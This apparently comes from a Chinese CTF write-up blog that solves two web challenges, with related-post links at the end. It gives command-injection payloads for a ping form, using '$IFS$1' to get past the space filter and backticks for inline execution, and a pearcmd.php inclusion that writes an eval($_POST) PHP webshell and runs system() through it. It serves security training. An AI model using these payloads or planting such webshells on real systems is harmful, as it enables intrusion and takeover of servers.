题目地址:BUUCTF在线评测

考点:ping命令相关命令执行

这里过滤了flag和空格

绕过空格可以使用

$IFS$1

使用ls命令查询目录

?ip=127.0.0.1;ls

发现有两个文件,一个是flag.php,另一个是index.php。

cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码

?ip=127.0.0.1;cat$IFS$1index.php

过滤了很多东西,包括flag。

可以使用反引号是作为内联执行,`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。

?ip=127.0.0.1;cat$IFS$1`ls`

访问源代码:

拿到flag.

flag{8b1f0054-5f92-402d-ad1a-ecc5ebcf0777}

[HXBCTF 2021]easywill

利用pearcmd.php进行文件包含。

在burpsuite里抓包将参数传进去,然后再放包,不然<>会被url编码,导致写入的一句话木马失效。

?name=cfile&value=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[0])?>+/tmp/aa.php

接着访问:

?name=cfile&value=/tmp/aa.php

POST传参:

0=system('ls /');

命令执行查看目录,知道flag在

flag32897328937298hdwidh下面

直接拿flag:

0=system('cat /flag32897328937298hdwidh');

BUUCTF [GXYCTF2019]Ping Ping Ping easywill相关推荐

  1. buuctf[GXYCTF2019]Ping Ping Ping

    buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行p ...

  2. linux命令菜鸟ping,Linux ping命令

    Linux ping命令 Linux ping命令用于检测主机. 执行ping指令会使用ICMP传输协议,发出要求回应的信息,若远端主机的网络功能没有问题,就会回应该信息,因而得知该主机运作正常. 语 ...

  3. 复制vmware overLay网络无法ping通 ping www.baidu.com可以

    因为忘记关闭防火墙了!!!!!    要永久关闭!! 修改hostname https://blog.csdn.net/qq_27327261/article/details/109100219 关闭 ...

  4. linux使用ping命令ping本机,Linux下使用ping命令判断网络的好坏

    简介 在Linux系统里面如果想判断网络的好坏,脑海中蹦出的第一个命令就是ping了. ping命令基本是最常用的网络命令,它可以用来测试与目标主机的连通性. ping通过发送ICMP ECHO_RE ...

  5. 虚拟机ping网关ping不通

    虚拟机ping网关ping不通,可能自己遇到的比较奇特,开始访问正常,过一段时间就不正常,分享一下解决办法: 首先ping同网段的可以ping的通,说明vmnet8的ipv4不和虚拟机配置的vmnet ...

  6. 全网超详细的如何Ping特定的端口号,比如telnet Ping,nc Ping,nmap Ping等

    文章目录 1. 文章引言 2. ping特定端口 2.1 使用telnet ping特定端口 2.2 使用nc ping特定端口 2.3 使用nmap ping端口 2.4 使用Powershell ...

  7. C# ping命令,ping网络状态

    Ping ping = new Ping(); PingReply pingReply = ping.Send("192.168.1.1"); //网络状态 if (pingRep ...

  8. BUUCTF [GXYCTF2019] 禁止套娃

    题目分析 这题对我这个小白来说好难理解,慢慢补坑吧.PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通. 打开题目,只有如下: 看源码也没有什么东西,常见的信息泄露:robots ...

  9. BUUCTF | [GXYCTF2019]BabySQli

    BUUCTF | [GXYCTF2019]BabySQli 一.必备基础知识 当=号被过滤了使用like,rlike绕过 当or被过滤了使用大小写绕过,双写绕过,&&绕过 二.实战化渗 ...

最新文章

  1. YOLOV5的多主干网络backbone实现(Mobilenetv3Small、EagleEye、EfficientNetLite-0、PP-LCNet-1x、SwinTrans-YOLOv5等)
  2. linux shell 实现循环输出
  3. 【全网最全的博客美化系列教程】06.推荐和反对炫酷样式的实现
  4. 添加python虚拟环境
  5. Python基础之条件判断
  6. android用什么测试类,android – 使用firebase对类进行JUnit测试
  7. 未来机器人哆拉A梦身上的高科技程序应用
  8. 推荐一款优雅高效的免费在线APP原型工具
  9. 【Java】UDP Socket编程案例——文件传输聊天工具
  10. JAVA调试出现不断在ClassLoader类中执行时的问题?
  11. 敏感性分析算法 程序_计算机程序设计艺术(TAOCP)精读笔记1 - 算法分析真正应该有的样子 Part 1...
  12. Android Button 实现透明 + 圆角按钮效果
  13. python--------集合练习题(问卷的调查)
  14. FusionChartsFree的JSP标签开发
  15. 解决System进程占用80端口
  16. 在线流程图和思维导图开发技术详解(一)
  17. 华为交换机 查ip冲突_华为交换机如何查看本交换机IP地址?
  18. Katalon Studio:一款静候你使用的免费自动化测试工具
  19. 学会了C语言究竟能干什么呢?
  20. Zookeeper 深入进阶 —— ZAB 协议

热门文章

  1. SQL Server获取特定字符前的数字
  2. dlib人脸比对程序设计(C++)
  3. vscode写php高亮,vscode如何设置代码高亮_编程开发工具
  4. 一看就会的Chromedriver(谷歌浏览器驱动)安装教程
  5. Codeforces Round #739 (Div. 3) 「A B C D E F1 F2」
  6. c++设计一个模拟网上购书的结账系统
  7. 育儿品牌“亲宝宝”获数亿元C轮融资,好未来领投,顺为、复星跟投
  8. Linux 查找最大文件
  9. VIJOS-P1571 笨笨的导弹攻击
  10. 入侵防御之snort规则编写